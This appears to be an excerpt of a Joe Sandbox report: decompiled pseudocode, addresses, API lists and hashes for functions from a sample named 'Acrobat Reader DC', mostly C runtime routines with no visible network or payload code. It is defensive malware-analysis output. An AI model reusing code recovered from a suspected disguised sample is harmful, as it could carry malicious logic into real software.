				intOrPtr _t22;
				void* _t24;
				intOrPtr _t27;
				struct HINSTANCE__* _t32;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t63;

				_t63 = __fp0;
				_t21 =  *0x4a9604; // 0xa72e98
				if( *((intOrPtr*)(_t21 + 0x1d)) == 0) {
					_t22 = 1;
				} else {
					_t41 = _a4;
					 *0x497520 = _a4;
					 *0x4974f4 = 0;
					 *0x4974f0 = 0;
					_v36 = 0;
					_v28 = 1;
					_v24 = 0;
					_v20 = 0;
					_v12 = 1;
					_v8 = 0;
					E00408F40(1,  &_v36);
					_t43 =  &_v20;
					_v28 = 6;
					_v36 =  &_v20;
					_v48 = 0;
					_v40 = 0;
					 *0x49751c = 0;
					_t24 = E0040EBB0( &_v48);
					_t61 = _t24;
					if(_t24 != 0) {
						 *0x49751c =  *((intOrPtr*)(E0040EC00( &_v48, _t61)))();
					}
					E00411951(0, _t43, 1, 0x4370c3);
					E004119B0(1);
					_t27 =  *0x4a9608; // 0xa72f00
					E0040F4E0(_t41, _t27);
					E0040D590(_a12, _t41, _t61, _t63);
					_t42 =  *0x4a9608; // 0xa72f00
					SystemParametersInfoW(0x2001, 0,  *(_t42 + 4), 2);
					_t32 = _v52;
					_t48 =  *0x4974f4;
					if(_t32 != 0) {
						FreeLibrary(_t32);
					}
					E00408F40(_t48,  &_v20);
					E00408F40(_t48,  &_v36);
					_t22 = _t48;
				}
				return _t22;
			}























                                  0x0040d6b0
                                  0x0040d6b6
                                  0x0040d6c6
                                  0x0042e2f3
                                  0x0040d6cc
                                  0x0040d6cc
                                  0x0040d6d8
                                  0x0040d6de
                                  0x0040d6e4
                                  0x0040d6ea
                                  0x0040d6ee
                                  0x0040d6f2
                                  0x0040d6f6
                                  0x0040d6fa
                                  0x0040d6fe
                                  0x0040d702
                                  0x0040d707
                                  0x0040d70f
                                  0x0040d717
                                  0x0040d71b
                                  0x0040d71f
                                  0x0040d723
                                  0x0040d729
                                  0x0040d72e
                                  0x0040d730
                                  0x0040d739
                                  0x0040d739
                                  0x0040d743
                                  0x0040d74c
                                  0x0040d751
                                  0x0040d75a
                                  0x0040d762
                                  0x0040d767
                                  0x0040d779
                                  0x0040d77f
                                  0x0040d783
                                  0x0040d78b
                                  0x0040d78e
                                  0x0040d78e
                                  0x0040d798
                                  0x0040d7a1
                                  0x0040d7a6
                                  0x0040d7a6
                                  0x0040d7ae

                                  APIs
                                  • SystemParametersInfoW.USER32 ref: 0040D779
                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeInfoLibraryParametersSystem
                                  • String ID:
                                  • API String ID: 3403648963-0
                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414C76 Relevance: 3.0, APIs: 2, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00414C76(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;

				_push(0xc);
				_push(0x48d048);
				E00416C70(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E00415471( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E00414ABA( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E00414CFA();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00412F40( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
						}
						 *((intOrPtr*)(E00417F77(_t41))) = 0x16;
						E00417F25();
						goto L6;
					}
				}
				return E00416CB5(_t19);
			}






                                  0x00414c76
                                  0x00414c78
                                  0x00414c7d
                                  0x00414c84
                                  0x00414c8a
                                  0x00414cbb
                                  0x00414cbb
                                  0x00414c91
                                  0x00414c94
                                  0x00414cc6
                                  0x00414ccc
                                  0x00414cde
                                  0x00414ce6
                                  0x00414ce9
                                  0x00414cf0
                                  0x00414cf5
                                  0x00414c96
                                  0x00414c96
                                  0x00414c9a
                                  0x00414ca3
                                  0x00414ca8
                                  0x00414cb0
                                  0x00414cb6
                                  0x00000000
                                  0x00414cb6
                                  0x00414c94
                                  0x00414cc2

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_file_memset
                                  • String ID:
                                  • API String ID: 26237723-0
                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00414A46(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0x48d028);
				E00416C70(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E00415471(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E004149D9(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00414AB2(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00417F77(_t36))) = 0x16;
					_t22 = E00417F25() | 0xffffffff;
				}
				return E00416CB5(_t22);
			}








                                  0x00414a46
                                  0x00414a48
                                  0x00414a4d
                                  0x00414a52
                                  0x00414a58
                                  0x00414a5b
                                  0x00414a60
                                  0x00414a62
                                  0x00414a79
                                  0x00414a7d
                                  0x00414a8d
                                  0x00414a93
                                  0x00414a98
                                  0x00414a9e
                                  0x00414aa1
                                  0x00414aa8
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a83
                                  0x00414a64
                                  0x00414a69
                                  0x00414a74
                                  0x00414a74
                                  0x00414a8b

                                  APIs
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  • __lock_file.LIBCMT ref: 00414A8D
                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00414FE2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed int _t17;
				void* _t27;
				intOrPtr _t29;

				_push(0xc);
				_push(0x48d068);
				E00416C70(__ebx, __edi, __esi);
				_t29 =  *((intOrPtr*)(_t27 + 8));
				_t30 = _t29 != 0;
				if(_t29 != 0) {
					E00415471( *((intOrPtr*)(_t27 + 8)));
					_t5 = _t27 - 4;
					 *_t5 =  *(_t27 - 4) & 0x00000000;
					__eflags =  *_t5;
					_t15 = E00414E4E(__edx,  *((intOrPtr*)(_t27 + 8))); // executed
					 *(_t27 - 0x1c) = _t15;
					 *(_t27 - 4) = 0xfffffffe;
					E0041503D();
					_t17 =  *(_t27 - 0x1c);
				} else {
					 *((intOrPtr*)(E00417F77(_t30))) = 0x16;
					_t17 = E00417F25() | 0xffffffff;
				}
				return E00416CB5(_t17);
			}







                                  0x00414fe2
                                  0x00414fe4
                                  0x00414fe9
                                  0x00414ff0
                                  0x00414ff6
                                  0x00414ff8
                                  0x00415012
                                  0x00415018
                                  0x00415018
                                  0x00415018
                                  0x0041501f
                                  0x00415025
                                  0x00415028
                                  0x0041502f
                                  0x00415034
                                  0x00414ffa
                                  0x00414fff
                                  0x0041500a
                                  0x0041500a
                                  0x0041503c

                                  APIs
                                  • __lock_file.LIBCMT ref: 00415012
                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411682 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00411682(int _a4) {

				E00411657(_a4);
				ExitProcess(_a4);
			}



                                  0x0041168a
                                  0x00411693

                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 0041168A
                                    • Part of subcall function 00411657: GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
                                    • Part of subcall function 00411657: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
                                  • ExitProcess.KERNEL32 ref: 00411693
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction ID: f47d9122093ed6489770cc06aed7b78ba16bb349dce56bb799ac8566cdeb1789
                                  • Opcode Fuzzy Hash: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction Fuzzy Hash: 56B09B310001487BCB052F16DD0D84D3F15DB413907544029F91905031DF779D919688
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E00402780(intOrPtr* __eax, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t40;
				signed int _t41;
				intOrPtr _t44;
				intOrPtr* _t50;
				signed int _t51;
				signed short _t52;
				signed int _t53;
				intOrPtr* _t55;
				signed int _t56;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				void* _t77;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr* _t80;
				void* _t83;

				_t77 = __edi;
				_t57 = __eax;
				_t1 = _t77 + 0xc; // 0x43
				_t40 =  *_t1;
				_push(_t78);
				_t86 =  *((intOrPtr*)(__edi + 8)) - _t40;
				if( *((intOrPtr*)(__edi + 8)) == _t40) {
					_t41 = _t40 + _t40;
					 *(__edi + 0xc) = _t41;
					__eflags = _t41 - 4;
					if(__eflags < 0) {
						_t79 = 4;
					} else {
						_t79 = _t41;
					}
					 *(_t77 + 0xc) = _t79;
					_push( ~(0 | __eflags > 0x00000000) | _t79 * 0x00000004);
					_t44 = E004115D7(_t77, _t79, __eflags);
					_t33 = _t77 + 4; // 0x444ad7
					_t78 = _t44;
					_t34 = _t77 + 8; // 0x530041
					E00410E60(_t78,  *_t33,  *_t34 +  *_t34 +  *_t34 +  *_t34);
					_t35 = _t77 + 4; // 0x444ad7
					_push( *_t35);
					E004111DC();
					_t83 = _t83 + 0x14;
					 *((intOrPtr*)(_t77 + 4)) = _t78;
				}
				_push(0xc); // executed
				_t50 = E004115D7(_t77, _t78, _t86); // executed
				if(_t50 == 0) {
					_t80 = 0;
					goto L6;
				} else {
					_t80 = _t50;
					_t52 =  *((intOrPtr*)(_t57 + 8));
					 *(_t80 + 8) = _t52;
					_t53 = _t52 & 0x0000ffff;
					 *((short*)(_t80 + 0xa)) =  *((intOrPtr*)(_t57 + 0xa));
					if(_t53 <= 0x3f) {
						__eflags = _t53 - 0x30;
						if(__eflags < 0) {
							goto L3;
						} else {
							_push(0x10); // executed
							_t55 = E004115D7(_t77, _t80, __eflags); // executed
							__eflags = _t55;
							if(_t55 == 0) {
								_t55 = 0;
							} else {
								_t58 =  *_t57;
								 *_t55 =  *_t58;
								 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t58 + 4));
								 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t58 + 8));
								_t59 =  *((intOrPtr*)(_t58 + 0xc));
								 *((intOrPtr*)(_t55 + 0xc)) = _t59;
								 *_t59 =  *_t59 + 1;
								__eflags =  *_t59;
							}
							 *_t80 = _t55;
							_t19 = _t77 + 8; // 0x530041
							_t56 =  *_t19;
							_t20 = _t77 + 4; // 0x444ad7
							 *((intOrPtr*)( *_t20 + _t56 * 4)) = _t80;
							_t23 = _t77 + 8;
							 *_t23 =  *(_t77 + 8) + 1;
							__eflags =  *_t23;
							return _t56;
						}
					} else {
						L3:
						if(_t53 == 0x10) {
							 *_t80 =  *_t57;
							 *((intOrPtr*)(_t80 + 4)) =  *((intOrPtr*)(_t57 + 4));
						} else {
							if(_t53 == 0x20) {
								 *_t80 =  *_t57;
							} else {
								 *_t80 =  *_t57;
							}
						}
						L6:
						_t7 = _t77 + 8; // 0x530041
						_t51 =  *_t7;
						_t8 = _t77 + 4; // 0x444ad7
						 *((intOrPtr*)( *_t8 + _t51 * 4)) = _t80;
						 *(_t77 + 8) =  *(_t77 + 8) + 1;
						return _t51;
					}
				}
			}





















                                  0x00402780
                                  0x00402781
                                  0x00402783
                                  0x00402783
                                  0x00402786
                                  0x00402787
                                  0x0040278a
                                  0x00402827
                                  0x00402829
                                  0x0040282c
                                  0x0040282f
                                  0x00402876
                                  0x00402831
                                  0x00402831
                                  0x00402831
                                  0x00402841
                                  0x00402848
                                  0x00402849
                                  0x0040284e
                                  0x00402851
                                  0x00402853
                                  0x0040285d
                                  0x00402862
                                  0x00402865
                                  0x00402866
                                  0x0040286b
                                  0x0040286e
                                  0x0040286e
                                  0x00402790
                                  0x00402792
                                  0x0040279c
                                  0x00426845
                                  0x00000000
                                  0x004027a2
                                  0x004027a2
                                  0x004027a4
                                  0x004027a8
                                  0x004027b0
                                  0x004027b3
                                  0x004027bb
                                  0x004027e4
                                  0x004027e8
                                  0x00000000
                                  0x004027ea
                                  0x004027ea
                                  0x004027ec
                                  0x004027f4
                                  0x004027f6
                                  0x00426826
                                  0x004027fc
                                  0x004027fc
                                  0x00402800
                                  0x00402805
                                  0x0040280b
                                  0x0040280e
                                  0x00402811
                                  0x00402814
                                  0x00402814
                                  0x00402814
                                  0x00402816
                                  0x00402818
                                  0x00402818
                                  0x0040281b
                                  0x0040281e
                                  0x00402821
                                  0x00402821
                                  0x00402821
                                  0x00402826
                                  0x00402826
                                  0x004027bd
                                  0x004027bd
                                  0x004027c1
                                  0x0042682f
                                  0x00426834
                                  0x004027c7
                                  0x004027cb
                                  0x0042683e
                                  0x004027d1
                                  0x004027d3
                                  0x004027d3
                                  0x004027cb
                                  0x004027d5
                                  0x004027d5
                                  0x004027d5
                                  0x004027d8
                                  0x004027db
                                  0x004027de
                                  0x004027e3
                                  0x004027e3
                                  0x004027bb

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                  • Opcode Fuzzy Hash: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F760 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040F760(signed int __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4) {
				char _v268;
				char _v412;
				char _v428;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t29;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t36;
				void* _t40;
				intOrPtr _t42;
				void* _t51;
				signed int _t53;
				signed int _t58;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t66;
				signed int _t67;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_push(_t62);
				_t63 = E0040F6F0(0x484ea8, __ecx | 0xffffffff, _t62);
				E00413650( &_v268, _t63);
				_push(_t63);
				E004111DC();
				_t70 = (_t67 & 0xfffffff8) - 0x1a8 + 0xc;
				_t64 =  &_v412;
				E0040F820( &_v412);
				E0040F850( &_v268,  &_v412, _t75);
				 *(__edi + 8) = 0;
				_t51 = 0;
				_t29 = 0;
				do {
					_t32 = _t29 + ( *(_t70 + _t51 + 0x18) & 0x000000ff) + ( *(_t70 + _t51 + 0x19) & 0x000000ff) + ( *(_t70 + _t51 + 0x1a) & 0x000000ff);
					_t58 =  *(_t70 + _t51 + 0x1b) & 0x000000ff;
					_t51 = _t51 + 4;
					_t29 = _t32 + _t58;
				} while (_t51 < 0x10);
				 *(__edi + 8) = _t29;
				_t34 = E004149C2(_a4, L"rb"); // executed
				_t71 = _t70 + 8;
				 *__edi = _t34;
				if(_t34 == 0) {
					_t35 = 1;
				} else {
					_t36 = E0040F5C0(__edi); // executed
					_t79 = _t36;
					if(_t36 == 0) {
						E00414D04( &_v428, 1, 0x10,  *__edi);
						_t72 = _t71 + 0x10;
						E0044AFEF( &_v428, __eflags,  &_v428, 0x10, 0x99f2);
						_t40 = 0;
						 *(__edi + 8) = 0;
						_t53 = 0;
						__eflags = 0;
						do {
							_t60 =  *(_t72 + _t40 + 8) & 0x000000ff;
							_t40 = _t40 + 1;
							_t53 = _t53 * _t60;
							__eflags = _t40 - 0x10;
						} while (__eflags < 0);
						_push( *__edi);
						 *(__edi + 8) = _t53;
						_t42 = E00414FE2(0, _t60, __edi, _t64, __eflags); // executed
						 *((intOrPtr*)(__edi + 4)) = _t42;
						_t35 = 0;
					} else {
						_push( *__edi);
						_t66 = _t36;
						E00414A46(0, _t58, __edi, _t66, _t79);
						_t35 = _t66;
					}
				}
				return _t35;
			}




























                                  0x0040f760
                                  0x0040f76d
                                  0x0040f77b
                                  0x0040f786
                                  0x0040f78b
                                  0x0040f78c
                                  0x0040f791
                                  0x0040f794
                                  0x0040f798
                                  0x0040f7a6
                                  0x0040f7ad
                                  0x0040f7b0
                                  0x0040f7b2
                                  0x0040f7b4
                                  0x0040f7c7
                                  0x0040f7c9
                                  0x0040f7ce
                                  0x0040f7d1
                                  0x0040f7d3
                                  0x0040f7d8
                                  0x0040f7e4
                                  0x0040f7e9
                                  0x0040f7ec
                                  0x0040f7f0
                                  0x00427c2a
                                  0x0040f7f6
                                  0x0040f7f7
                                  0x0040f7fc
                                  0x0040f7fe
                                  0x00427c40
                                  0x00427c45
                                  0x00427c54
                                  0x00427c59
                                  0x00427c5b
                                  0x00427c5e
                                  0x00427c5e
                                  0x00427c60
                                  0x00427c60
                                  0x00427c65
                                  0x00427c66
                                  0x00427c69
                                  0x00427c69
                                  0x00427c70
                                  0x00427c71
                                  0x00427c74
                                  0x00427c7c
                                  0x00427c7f
                                  0x0040f804
                                  0x0040f806
                                  0x0040f807
                                  0x0040f809
                                  0x0040f811
                                  0x0040f811
                                  0x0040f7fe
                                  0x0040f818

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                                  • String ID:
                                  • API String ID: 3898977315-0
                                  • Opcode ID: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                  • Opcode Fuzzy Hash: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
